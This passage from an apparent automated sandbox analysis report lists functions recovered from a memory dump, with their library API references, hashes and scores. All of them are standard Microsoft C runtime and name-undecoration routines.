DName::setIsUDC.LIBCMTD ref: 6E1A0308
DName::isEmpty.LIBCMTD ref: 6E1A0312
operator+.LIBVCRUNTIMED ref: 6E1A0348
Mailbox.LIBCMTD ref: 6E1A0354
Mailbox.LIBCMTD ref: 6E1A0360

Strings

_, xrefs: 6E19FA07

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Iterator_baseIterator_base::_MailboxNameName::std::_$Name::operator+=operator+$EmptyName::isName::set
String ID: _
API String ID: 2065213285-701932520
Opcode ID: 0481bae16ebe332cbe7b875b8162f8c0f336026a82f90dee709d6d2081430156
Instruction ID: 19788875af26142bdfe2f0ff91b525ff607a275e92023ff87fb749200d440275
Opcode Fuzzy Hash: 0481bae16ebe332cbe7b875b8162f8c0f336026a82f90dee709d6d2081430156
Instruction Fuzzy Hash: 18A1A670900508DFCB09DFE8D8A4BED7B7ABF45304F004599E6159B294EB706AC5EF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A04F0, Relevance: 35.3, APIs: 19, Strings: 1, Instructions: 276COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A04F9
operator+.LIBVCRUNTIMED ref: 6E1A052E
DName::isEmpty.LIBCMTD ref: 6E1A0541
Mailbox.LIBCMTD ref: 6E1A0595
DName::setPtrRef.LIBCMTD ref: 6E1A05AC
char_traits.LIBCPMTD ref: 6E1A05BA
operator+.LIBVCRUNTIMED ref: 6E1A0601

Strings

B, xrefs: 6E1A0509

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: operator+$EmptyIterator_baseIterator_base::_MailboxName::isName::setchar_traitsstd::_
String ID: B
API String ID: 1073764026-1255198513
Opcode ID: f16f2cf5204342b996b09f492fad45049382ad71db0aff53902c6e8c9e9f8f77
Instruction ID: ba8fafd5ab94bcefb7c36ecb33276fcee95d9be2e66cbc7f176579477762440d
Opcode Fuzzy Hash: f16f2cf5204342b996b09f492fad45049382ad71db0aff53902c6e8c9e9f8f77
Instruction Fuzzy Hash: 0AB160B5D01508EFCB05DFE8D890AED77B9BF45344F048518FA199B281E7B1AA80EBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A3A40, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 243COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A3A9B
Mailbox.LIBCMTD ref: 6E1A3AC0
DName::operator=.LIBVCRUNTIMED ref: 6E1A3B18
und_strncmp.LIBCMTD ref: 6E1A3B55
DName::getString.LIBCMTD ref: 6E1A3C1D
Mailbox.LIBCMTD ref: 6E1A3C70

Part of subcall function 6E199700: DName::DName.LIBVCRUNTIMED ref: 6E199718

Replicator::isFull.LIBCMTD ref: 6E1A3D42
Replicator::operator+=.LIBCMTD ref: 6E1A3D55
Mailbox.LIBCMTD ref: 6E1A3D61

Strings

@, xrefs: 6E1A3AE0

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mailbox$FullIterator_baseIterator_base::_NameName::Name::getName::operator=Replicator::isReplicator::operator+=Stringstd::_und_strncmp
String ID: @
API String ID: 3194277874-2766056989
Opcode ID: 6b99eb2d7b4b8e20f4d7cf8ceb32b1c9b2222da4bac718d479c961559b570ca9
Instruction ID: 2c27ae94ff3160cf48081ec8605051b091b826f7be725ed9d88ec495aeb482b0
Opcode Fuzzy Hash: 6b99eb2d7b4b8e20f4d7cf8ceb32b1c9b2222da4bac718d479c961559b570ca9
Instruction Fuzzy Hash: 04A1A275D01608DFCB05DFE8DC94BEEBBBABF05304F104529E615AB284DB706985EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E5F20, Relevance: 34.8, APIs: 23, Instructions: 321timememoryCOMMON

Download Yara Rule

APIs

__wcstombs_l.LIBCMTD ref: 6E1E5FE3
__MarkAllocaS.LIBCMTD ref: 6E1E5FEC
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1E6007
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1E6012
std::_Mutex::_Lock.LIBCPMTD ref: 6E1E6030

Part of subcall function 6E1D81B0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 6E1D81E3

std::_Mutex::_Lock.LIBCPMTD ref: 6E1E606D
std::_Mutex::_Lock.LIBCPMTD ref: 6E1E60B0

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: std::_$LockMutex::_$TimevecTimevec::_$AllocaByteCharMarkMultiWide__wcstombs_l
String ID:
API String ID: 3719586419-0
Opcode ID: 6e38309ae6be1720563525b927c3ed08a19f47a77e94a5c9ff2ce76f981aa7c8
Instruction ID: 30952caf85dff8093e349d8c9826534a1040f62f404f0e05ff5ab3643727125c
Opcode Fuzzy Hash: 6e38309ae6be1720563525b927c3ed08a19f47a77e94a5c9ff2ce76f981aa7c8
Instruction Fuzzy Hash: 95C10AB591050DEFDB04DFD8D890FEEB7B9AB54308F104558F611AB680EB70AE85EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E19C550, Relevance: 33.2, APIs: 22, Instructions: 210COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMTD ref: 6E19C59A
DName::operator+.LIBCMTD ref: 6E19C5AB
DName::isEmpty.LIBCMTD ref: 6E19C718
operator+.LIBVCRUNTIMED ref: 6E19C743
DName::operator+.LIBCMTD ref: 6E19C75C
DName::operator+.LIBCMTD ref: 6E19C770
DName::operator+.LIBCMTD ref: 6E19C784

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name::operator+$EmptyName::isoperator+
String ID:
API String ID: 2054230242-0
Opcode ID: cd16f79d5ea07f61cea09a5c0d968dc69b397a0e6eb1a7e446529138ac45e0e1
Instruction ID: 6c4d39262dba080a5151a08a9c90bdf8bed1597c9c9185d10f6ed1fa66a8dc58
Opcode Fuzzy Hash: cd16f79d5ea07f61cea09a5c0d968dc69b397a0e6eb1a7e446529138ac45e0e1
Instruction Fuzzy Hash: CC813E75D10108AFDB04DFE4DCA0FEEB7B9AF54304F508569E519AB290EB306A84EF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19C8E0, Relevance: 30.3, APIs: 20, Instructions: 327COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19C927
Mailbox.LIBCMTD ref: 6E19CDD4
DName::isEmpty.LIBCMTD ref: 6E19CDDC
Mailbox.LIBCMTD ref: 6E19CDEC
operator+.LIBVCRUNTIMED ref: 6E19CE5B
Mailbox.LIBCMTD ref: 6E19CE67
operator+.LIBVCRUNTIMED ref: 6E19CE9E
Mailbox.LIBCMTD ref: 6E19CEAA
operator+.LIBVCRUNTIMED ref: 6E19CF05
Mailbox.LIBCMTD ref: 6E19CF11
DName::isEmpty.LIBCMTD ref: 6E19CF19
operator+.LIBVCRUNTIMED ref: 6E19CF2F
Mailbox.LIBCMTD ref: 6E19CF47
operator+.LIBVCRUNTIMED ref: 6E19D0A6

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mailbox$operator+$EmptyName::is$Iterator_baseIterator_base::_std::_
String ID:
API String ID: 2623725463-0
Opcode ID: acce299e12a9ee56037719ad3f15edc1905d27fdb829934ff78f21c06b085f6e
Instruction ID: 6ea956001dd8c4438e322ab0f9fe91d3a6445a5a12bd8a29d6f1ce42bbe788ee
Opcode Fuzzy Hash: acce299e12a9ee56037719ad3f15edc1905d27fdb829934ff78f21c06b085f6e
Instruction Fuzzy Hash: 85D14EB5C00109AFCB15DFE4DC60AEDBBB8BF55304F0445AAE5197B284EB305685EF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19EBE0, Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19EBE9
DName::DName.LIBVCRUNTIMED ref: 6E19EC72
DName::DName.LIBVCRUNTIMED ref: 6E19ECED
DName::DName.LIBVCRUNTIMED ref: 6E19ED05
DName::DName.LIBVCRUNTIMED ref: 6E19ED6C

Part of subcall function 6E1992D0: __aullrem.LIBCMT ref: 6E199317
Part of subcall function 6E1992D0: __aulldiv.LIBCMT ref: 6E199330

DName::operator+.LIBCMTD ref: 6E19ED79

Part of subcall function 6E199860: Mailbox.LIBCMTD ref: 6E199870
Part of subcall function 6E199860: Mailbox.LIBCMTD ref: 6E199888

Mailbox.LIBCMTD ref: 6E19ED82
DName::operator+.LIBCMTD ref: 6E19ED90
Mailbox.LIBCMTD ref: 6E19ED99
DName::operator+.LIBCMTD ref: 6E19EDC4

Part of subcall function 6E1998A0: Mailbox.LIBCMTD ref: 6E1998B0
Part of subcall function 6E1998A0: DName::operator+=.LIBCMTD ref: 6E1998BD
Part of subcall function 6E1998A0: Mailbox.LIBCMTD ref: 6E1998C9

Mailbox.LIBCMTD ref: 6E19EDCD
DName::operator+=.LIBCMTD ref: 6E19EDF5

Part of subcall function 6E199C00: DName::isValid.LIBCMTD ref: 6E199C0A
Part of subcall function 6E199C00: DName::isEmpty.LIBCMTD ref: 6E199C16
Part of subcall function 6E199C00: DName::operator=.LIBVCRUNTIMED ref: 6E199C32

DName::setIsComArray.LIBCMTD ref: 6E19EDFD
Mailbox.LIBCMTD ref: 6E19EE09
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19EE16

Strings

C, xrefs: 6E19EC12

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mailbox$NameName::$Name::operator+$Iterator_baseIterator_base::_Name::isName::operator+=std::_$ArrayEmptyName::operator=Name::setValid__aulldiv__aullrem
String ID: C
API String ID: 961569035-1037565863
Opcode ID: 891d95f04f7bfbe91708c0816c5cb8ca3c673aa5ce894658106f46858b7ba042
Instruction ID: cae4965adbf19adf240c38d2801e62ebd67feb4cbc45cf14374c2780a9e1b164
Opcode Fuzzy Hash: 891d95f04f7bfbe91708c0816c5cb8ca3c673aa5ce894658106f46858b7ba042
Instruction Fuzzy Hash: 1F61BF30505945DFDB09DFA4C8A4BEE77B6FB42304F1446A9E5625B2D0CBB1AAC0FB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A3840, Relevance: 25.7, APIs: 17, Instructions: 154COMMON

Download Yara Rule

APIs

Mailbox.LIBCMTD ref: 6E1A384D
DName::isValid.LIBCMTD ref: 6E1A3855
DName::operator+.LIBCMTD ref: 6E1A388B

Part of subcall function 6E1998A0: Mailbox.LIBCMTD ref: 6E1998B0
Part of subcall function 6E1998A0: DName::operator+=.LIBCMTD ref: 6E1998BD
Part of subcall function 6E1998A0: Mailbox.LIBCMTD ref: 6E1998C9

DName::operator+.LIBCMTD ref: 6E1A389E

Part of subcall function 6E199860: Mailbox.LIBCMTD ref: 6E199870
Part of subcall function 6E199860: Mailbox.LIBCMTD ref: 6E199888

Mailbox.LIBCMTD ref: 6E1A38A7
DName::isValid.LIBCMTD ref: 6E1A38AF

Part of subcall function 6E199990: DName::isValid.LIBCMTD ref: 6E19999C
Part of subcall function 6E199990: DName::isEmpty.LIBCMTD ref: 6E1999B1

DName::isValid.LIBCMTD ref: 6E1A38F2
operator+.LIBVCRUNTIMED ref: 6E1A3934

Part of subcall function 6E1997C0: DName::operator+.LIBCMTD ref: 6E1997E1

DName::operator+.LIBCMTD ref: 6E1A3948

Part of subcall function 6E199A30: DName::isValid.LIBCMTD ref: 6E199A3C
Part of subcall function 6E199A30: DName::isEmpty.LIBCMTD ref: 6E199A48
Part of subcall function 6E199A30: DName::isEmpty.LIBCMTD ref: 6E199A54
Part of subcall function 6E199A30: DName::operator=.LIBVCRUNTIMED ref: 6E199A69

DName::isValid.LIBCMTD ref: 6E1A3976
DName::isValid.LIBCMTD ref: 6E1A39B6
DName::operator+=.LIBCMTD ref: 6E1A39D1
DName::operator+=.LIBCMTD ref: 6E1A39DB

Part of subcall function 6E1A0FE0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A0FEC
Part of subcall function 6E1A0FE0: Mailbox.LIBCMTD ref: 6E1A1044

DName::isValid.LIBCMTD ref: 6E1A3A00
operator+.LIBVCRUNTIMED ref: 6E1A3A13
Mailbox.LIBCMTD ref: 6E1A3A1F
Mailbox.LIBCMTD ref: 6E1A3A2B

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Name::is$Mailbox$Valid$Name::operator+$EmptyName::operator+=$operator+$Iterator_baseIterator_base::_Name::operator=std::_
String ID:
API String ID: 1123558639-0
Opcode ID: 707682e9d33f6de8a782e3454fb6d240fcba8a8ac46630f263a49c38238b8320
Instruction ID: 4204129cc7aa68b3c301fd4d8ce0b58b6fb41c15fca020061d998b3269f9aab1
Opcode Fuzzy Hash: 707682e9d33f6de8a782e3454fb6d240fcba8a8ac46630f263a49c38238b8320
Instruction Fuzzy Hash: 4251F675D1050A9FDB04DFE4C9A5AFE77BDAF11304F204169E623A61C0EB306E85EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E19E490, Relevance: 24.2, APIs: 16, Instructions: 187COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIMED ref: 6E19E4CE
operator+.LIBVCRUNTIMED ref: 6E19E543

Part of subcall function 6E199790: DName::operator+.LIBCMTD ref: 6E1997B0

DName::DName.LIBVCRUNTIMED ref: 6E19E534

Part of subcall function 6E1992D0: __aullrem.LIBCMT ref: 6E199317
Part of subcall function 6E1992D0: __aulldiv.LIBCMT ref: 6E199330

DName::DName.LIBVCRUNTIMED ref: 6E19E57C
Mailbox.LIBCMTD ref: 6E19E591
DName::DName.LIBVCRUNTIMED ref: 6E19E5FA
operator+.LIBVCRUNTIMED ref: 6E19E609
DName::DName.LIBVCRUNTIMED ref: 6E19E621
Mailbox.LIBCMTD ref: 6E19E636

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: NameName::$Mailboxoperator+$Name::operator+__aulldiv__aullrem
String ID:
API String ID: 2030757049-0
Opcode ID: 9db36080e54d774ff4ae7990fb98eccfc9c5510410619abcada0ffc67a97fc20
Instruction ID: fabe150c5bc031a7cae715e15cdde10112b644df0f259d46ab7ca08e3e9bf2b4
Opcode Fuzzy Hash: 9db36080e54d774ff4ae7990fb98eccfc9c5510410619abcada0ffc67a97fc20
Instruction Fuzzy Hash: 24715570D05508EFCB04DFE5D9A0AEEBBF9BF49304F108559E525AB250D730AA81EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1C50, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A1C5D
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A1CC3
Mailbox.LIBCMTD ref: 6E1A1CFE
Mailbox.LIBCMTD ref: 6E1A1E10
Mailbox.LIBCMTD ref: 6E1A1E27
Replicator::isFull.LIBCMTD ref: 6E1A1E40
Replicator::operator+=.LIBCMTD ref: 6E1A1E53
DName::isEmpty.LIBCMTD ref: 6E1A1E5B
DName::operator+=.LIBCMTD ref: 6E1A1E71
DName::isValid.LIBCMTD ref: 6E1A1EB0
DName::DName.LIBVCRUNTIMED ref: 6E1A1EBE
Mailbox.LIBCMTD ref: 6E1A1EDB

Strings

6, xrefs: 6E1A1D4F

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mailbox$Iterator_baseIterator_base::_Name::isstd::_$EmptyFullNameName::Name::operator+=Replicator::isReplicator::operator+=Valid
String ID: 6
API String ID: 2413373717-498629140
Opcode ID: 920d6fd50f590281099ca96ac00e0e70dca19293de96f3c2b8a7f0a4a958cdc5
Instruction ID: 29227f63d6650a5921814b18f09f09e673e1eb72b751ec0f47e175f5dc6ad47f
Opcode Fuzzy Hash: 920d6fd50f590281099ca96ac00e0e70dca19293de96f3c2b8a7f0a4a958cdc5
Instruction Fuzzy Hash: DC7126B4A04554CFCB06DBF8C8A4BFEBBB6BF12304F04459DD66167280D7709988EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DA0A0, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

<program name unknown>, xrefs: 6E1DA17D

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID:
String ID: <program name unknown>
API String ID: 0-554726554
Opcode ID: c3f3a7fa7d2cddf26f9fbc5c19d31a429a850e4427a18379c8df69033d879b1a
Instruction ID: bd40d456001e855dd4d7ee195e0d1a2719a9f68a390503796d5f818b2750e3a8
Opcode Fuzzy Hash: c3f3a7fa7d2cddf26f9fbc5c19d31a429a850e4427a18379c8df69033d879b1a
Instruction Fuzzy Hash: 2F4124B6E4420CF7DB04EAE89C12FDE77AA5B50309F144514F7147E3C2EA719B449A92

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A1570, Relevance: 19.6, APIs: 13, Instructions: 111COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A1579
Mailbox.LIBCMTD ref: 6E1A1592
Mailbox.LIBCMTD ref: 6E1A1608
DName::DName.LIBVCRUNTIMED ref: 6E1A1675

Part of subcall function 6E199110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E19916E

DName::operator+.LIBCMTD ref: 6E1A1688
DName::operator+.LIBCMTD ref: 6E1A15FF

Part of subcall function 6E199860: Mailbox.LIBCMTD ref: 6E199870
Part of subcall function 6E199860: Mailbox.LIBCMTD ref: 6E199888

DName::operator+.LIBCMTD ref: 6E1A15EC

Part of subcall function 6E199820: Mailbox.LIBCMTD ref: 6E199830
Part of subcall function 6E199820: Mailbox.LIBCMTD ref: 6E199848

DName::operator=.LIBVCRUNTIMED ref: 6E1A163C
DName::isEmpty.LIBCMTD ref: 6E1A1646
DName::operator=.LIBVCRUNTIMED ref: 6E1A1654

Part of subcall function 6E1A0FE0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A0FEC
Part of subcall function 6E1A0FE0: Mailbox.LIBCMTD ref: 6E1A1044

DName::operator+.LIBCMTD ref: 6E1A169B
Mailbox.LIBCMTD ref: 6E1A16A4
Mailbox.LIBCMTD ref: 6E1A16B0

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mailbox$Name::operator+$Iterator_baseIterator_base::_NameName::operator=std::_$EmptyName::Name::isNode::makeStatus
String ID:
API String ID: 2733737839-0
Opcode ID: e20cc13034527b8d4afaeaf155469a2751b8a0eac88da1550403dd5b7301690f
Instruction ID: 6801ec9adb6137a313113756b5e39bec0f784660f5bd85e80746b13999e229f4
Opcode Fuzzy Hash: e20cc13034527b8d4afaeaf155469a2751b8a0eac88da1550403dd5b7301690f
Instruction Fuzzy Hash: 67418EB5E001089FCB05DFE4D8A1AFE7BBDAF41304F144569E216AB180EB702A84EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E19C260, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 155COMMON

Download Yara Rule

APIs

UnDecorator::doEllipsis.LIBCMTD ref: 6E19C294
UnDecorator::getArgumentList.LIBCMTD ref: 6E19C343

Part of subcall function 6E19C110: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19C120
Part of subcall function 6E19C110: DName::operator+=.LIBCMTD ref: 6E19C16C
Part of subcall function 6E19C110: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19C1D1
Part of subcall function 6E19C110: Replicator::isFull.LIBCMTD ref: 6E19C1F7
Part of subcall function 6E19C110: Replicator::operator+=.LIBCMTD ref: 6E19C20A
Part of subcall function 6E19C110: DName::operator=.LIBVCRUNTIMED ref: 6E19C22B
Part of subcall function 6E19C110: DName::operator+=.LIBCMTD ref: 6E19C237
Part of subcall function 6E19C110: Mailbox.LIBCMTD ref: 6E19C24A

Mailbox.LIBCMTD ref: 6E19C388
UnDecorator::doEllipsis.LIBCMTD ref: 6E19C3A4
DName::operator+.LIBCMTD ref: 6E19C40E
Mailbox.LIBCMTD ref: 6E19C417
Mailbox.LIBCMTD ref: 6E19C435
DName::DName.LIBVCRUNTIMED ref: 6E19C444

Part of subcall function 6E199110: DNameStatusNode::make.LIBVCRUNTIMED ref: 6E19916E

Mailbox.LIBCMTD ref: 6E19C457

Strings

Z, xrefs: 6E19C376
Z, xrefs: 6E19C27A

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mailbox$Decorator::doEllipsisIterator_baseIterator_base::_NameName::operator+=std::_$ArgumentDecorator::getFullListName::Name::operator+Name::operator=Node::makeReplicator::isReplicator::operator+=Status
String ID: Z$Z
API String ID: 3869916097-3829148472
Opcode ID: 562b3ac35d681c6e5a1cf64e7d5d3ce9d9b259748378350fbdab57f859114b52
Instruction ID: 9ce933df37e7eabf4f334f7955c70e1df79b2e274cc56e75b82c7b90b6e832c7
Opcode Fuzzy Hash: 562b3ac35d681c6e5a1cf64e7d5d3ce9d9b259748378350fbdab57f859114b52
Instruction Fuzzy Hash: A4615C70D01208EFDB05DFE9D890ADDBBF5BF49304F108569E558AB354E7706A80EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E19E7B0, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 171COMMON

Download Yara Rule

APIs

DName::operator+.LIBCMTD ref: 6E19E7F2

Part of subcall function 6E199920: Mailbox.LIBCMTD ref: 6E199930
Part of subcall function 6E199920: DName::operator+=.LIBCMTD ref: 6E19993C
Part of subcall function 6E199920: Mailbox.LIBCMTD ref: 6E199948

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19E802
UnDecorator::doEcsu.LIBCMTD ref: 6E19E815
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E19E854

Strings

W, xrefs: 6E19E9AF

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Iterator_baseIterator_base::_Mailboxstd::_$Decorator::doEcsuName::operator+Name::operator+=
String ID: W
API String ID: 4208403871-655174618
Opcode ID: 728484476c7a9dc927bd5ad8ef9f1d9abc9a0d30721992c5d082cd1a967827ef
Instruction ID: 80851113c7aa406c8cfa45be6184dbe650347c38c565eccc24b068e77dd4c4de
Opcode Fuzzy Hash: 728484476c7a9dc927bd5ad8ef9f1d9abc9a0d30721992c5d082cd1a967827ef
Instruction Fuzzy Hash: 58615EB1C00108EFDB05DFE4D890ADEBBF9BF15308F14456AE516AB254EB315A84EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A40B0, Relevance: 16.6, APIs: 11, Instructions: 117COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1A40B9
operator+.LIBVCRUNTIMED ref: 6E1A4127

Part of subcall function 6E199790: DName::operator+.LIBCMTD ref: 6E1997B0

Mailbox.LIBCMTD ref: 6E1A4133
UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1A4116

Part of subcall function 6E19E050: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E19E07B
Part of subcall function 6E19E050: Mailbox.LIBCMTD ref: 6E19E0C6

Mailbox.LIBCMTD ref: 6E1A4172
UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1A41A9
Mailbox.LIBCMTD ref: 6E1A41B5
DName::operator=.LIBVCRUNTIMED ref: 6E1A4202
Mailbox.LIBCMTD ref: 6E1A4225

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Mailbox$DecoratedDecorator::getName$Iterator_baseIterator_base::_Name::operator+Name::operator=operator+std::_
String ID:
API String ID: 1608807181-0
Opcode ID: e20bd42d91de01246076c80c29e2c29803fb4c33755daa0548343a5652b30e6b
Instruction ID: c92e357012c87b053bd512e474f61d4b8844fe784d39f1392627c9335a34e32b
Opcode Fuzzy Hash: e20bd42d91de01246076c80c29e2c29803fb4c33755daa0548343a5652b30e6b
Instruction Fuzzy Hash: 1E414AB5900504DFE705DBE4E8F0BFE3BBAAB52304F04056AD52247684EF706AC6EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5D40, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 299COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,00000000,?,6E1A6D52,?,?,?,?,?,?,?,6E1D0DE4,00000002,?,00000000), ref: 6E1A5D80
__invoke_watson_if_error.LIBCMTD ref: 6E1A5E23

Strings

@, xrefs: 6E1A5E4C
@, xrefs: 6E1A5EEF

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: HandleModule__invoke_watson_if_error
String ID: @$@
API String ID: 3976807648-149943524
Opcode ID: 3ccb672b0e5e06dc44ed1fe3f43bcf84ebe2f94750d6045ddbca94084e850b84
Instruction ID: 760ca32cca4684ccb0ebfe4fbf1b3dd7d508bc312329898d12d6ee6bcba78ee6
Opcode Fuzzy Hash: 3ccb672b0e5e06dc44ed1fe3f43bcf84ebe2f94750d6045ddbca94084e850b84
Instruction Fuzzy Hash: 9DD179B895422DEBDB24DFD8CC49BEAB776AB54304F1041D9E6086B280D3749BC4DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5850, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 296COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,00000000,?,6E1A6D22,?,?,?,?,?,?,?,6E1D042F,00000002,?,00000000), ref: 6E1A5890
__invoke_watson_if_error.LIBCMTD ref: 6E1A5933

Strings

@, xrefs: 6E1A595C
@, xrefs: 6E1A59F0

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: HandleModule__invoke_watson_if_error
String ID: @$@
API String ID: 3976807648-149943524
Opcode ID: 7eb49ddb76a96ea6052a370255cb60ae9f2b97b52033eba5ba955ca902a3306b
Instruction ID: a027559b33b9207277f0b97354bded43210652f6f6229fdb00b6cee422d925cb
Opcode Fuzzy Hash: 7eb49ddb76a96ea6052a370255cb60ae9f2b97b52033eba5ba955ca902a3306b
Instruction Fuzzy Hash: 52D15CB4904229DFDB24CF98CC89BEEB776AB69704F1044D9E7096B280D7705AC4DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A0980, Relevance: 15.2, APIs: 10, Instructions: 203COMMON

Download Yara Rule

APIs

DName::isEmpty.LIBCMTD ref: 6E1A09C0
operator+.LIBVCRUNTIMED ref: 6E1A0A13
DName::isEmpty.LIBCMTD ref: 6E1A0AD2
operator+.LIBVCRUNTIMED ref: 6E1A0C17

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: EmptyName::isoperator+
String ID:
API String ID: 1193048883-0
Opcode ID: 05d03316129eb316ed8b921b71311de30188eef5051969aa1bc8e72a01115cf7
Instruction ID: 4d71e57eb32710439bf1bf988eb26f607164f65636f4f2574aa12944f85e8f32
Opcode Fuzzy Hash: 05d03316129eb316ed8b921b71311de30188eef5051969aa1bc8e72a01115cf7
Instruction Fuzzy Hash: 7271BB75900504EFCB05DFD8D9A0AEE7BB9AF45304F108569F6199B285FB709A80EBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E197960, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 153COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIMED ref: 6E19796A

Part of subcall function 6E1985C0: __guard_icall_checks_enforced.LIBCMTD ref: 6E1985C6

___vcrt_getptd.LIBVCRUNTIMED ref: 6E197972
__FrameHandler3::isEHs.LIBVCRUNTIMED ref: 6E1979AA
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIMED ref: 6E1979F4
_Smanip.LIBCPMTD ref: 6E197A0F
__FrameHandler3::isNoExcept.LIBVCRUNTIMED ref: 6E197A5E

Strings

csm, xrefs: 6E197A74
csm, xrefs: 6E197980

Memory Dump Source

Source File: 00000003.00000002.592312651.000000006E170000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: false

Similarity

API ID: Frame$Handler3::is$EmptyExceptHandler3::SmanipStateUnwind___except_validate_context_record___vcrt_getptd__guard_icall_checks_enforced
String ID: csm$csm
API String ID: 2671830719-3733052814
Opcode ID: 550995e9a9f1dd3b3a466c31f1843f9f778e6330a00a1089aebad378464ee8f0
Instruction ID: 6b1b17848456ece354b84a728ad44d91d2f6239c6d0a6f410dd7a55492784f54
Opcode Fuzzy Hash: 550995e9a9f1dd3b3a466c31f1843f9f778e6330a00a1089aebad378464ee8f0
